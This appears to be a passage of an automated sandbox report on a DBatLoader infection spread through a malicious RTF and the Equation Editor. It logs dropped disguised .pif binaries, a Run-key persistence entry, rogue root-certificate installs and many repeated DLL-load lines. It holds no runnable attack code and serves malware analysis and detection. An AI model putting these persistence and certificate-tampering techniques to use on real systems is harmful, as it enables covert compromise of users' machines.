                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
                  Source: K0hpP6V2fo.LNK.0.drLNK file: ..\..\..\..\..\Desktop\K0hpP6V2fo.rtf
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdb,$ source: esentutl.exe, 00000008.00000003.393771298.00000000004D0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.8.dr
                  Source: Binary string: easinvoker.pdb source: audiodg.exe, 00000005.00000002.401375610.000000000DA67000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.401375610.000000000DACA000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.379716518.000000007ED00000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.400314447.0000000002D4E000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.401375610.000000000DA97000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.400087627.0000000001DD6000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdbH source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdbGCTL source: audiodg.exe, 00000005.00000002.401375610.000000000DA67000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.401375610.000000000DACA000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.401732992.000000000EB20000.00000004.00000800.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.379716518.000000007ED00000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.400314447.0000000002D4E000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.401732992.000000000EB4F000.00000004.00000800.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.401375610.000000000DA97000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.400087627.0000000001DD6000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdb source: esentutl.exe, 00000008.00000003.393771298.00000000004D0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.8.dr
                  Source: Binary string: ping.pdb source: esentutl.exe, 00000009.00000003.395779355.0000000000550000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.9.dr

                  Data Obfuscation

                  barindex
                  Yara detected DBatLoader
                  Source: Yara matchFile source: 5.2.audiodg.exe.2d20000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.audiodg.exe.1dd65a8.2.unpack, type: UNPACKEDPE
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F7697 push ebp; ret 2_2_008F76A3
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F7C96 push esi; ret 2_2_008F7C97
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F76B7 push ebp; ret 2_2_008F76C3
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F76E7 push ebp; ret 2_2_008F76F3
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F76FA push ebp; ret 2_2_008F7703
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008EE60B push ebp; ret 2_2_008EE60C
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F6008 push ebp; ret 2_2_008F600B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F5802 push ebx; ret 2_2_008F5803
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F6000 push ebp; ret 2_2_008F6003
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F6010 push ebp; ret 2_2_008F6013
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F7640 push ebp; ret 2_2_008F7643
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F5656 push ebp; ret 2_2_008F5657
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F5468 push esp; ret 2_2_008F546B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F6079 push ebp; ret 2_2_008F607B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F5674 push ebp; ret 2_2_008F568F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F6473 push edi; ret 2_2_008F653F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F5471 push esp; ret 2_2_008F5473
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F6071 push ebp; ret 2_2_008F6073
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F678A push esi; ret 2_2_008F678B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F6986 push esi; ret 2_2_008F6987
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F6782 push esi; ret 2_2_008F6783
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008EE5C3 push ebp; ret 2_2_008EE5C4
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008E01F4 push eax; retf 2_2_008E01F5
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F7710 push ebp; ret 2_2_008F7723
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F6F2C push esi; ret 2_2_008F6F33
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F6544 push edi; ret 2_2_008F6547
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F6957 push esi; ret 2_2_008F6977
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008E9165 push eax; retf 2_2_008E9171
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 17_2_02D6D2F5 push 02D6D367h; ret 17_2_02D6D35F
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 17_2_02D6D2FC push 02D6D367h; ret 17_2_02D6D35F
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 17_2_02D463B0 push 02D4640Bh; ret 17_2_02D46403

                  Persistence and Installation Behavior

                  barindex
                  Drops PE files with a suspicious file extension
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Qzzgbhha.PIFJump to dropped file
                  Installs new ROOT certificates
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\audiodg[1].exeJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\audiodg.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Qzzgbhha.PIFJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file

                  Boot Survival

                  barindex
                  Drops PE files to the user root directory
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run QzzgbhhaJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run QzzgbhhaJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
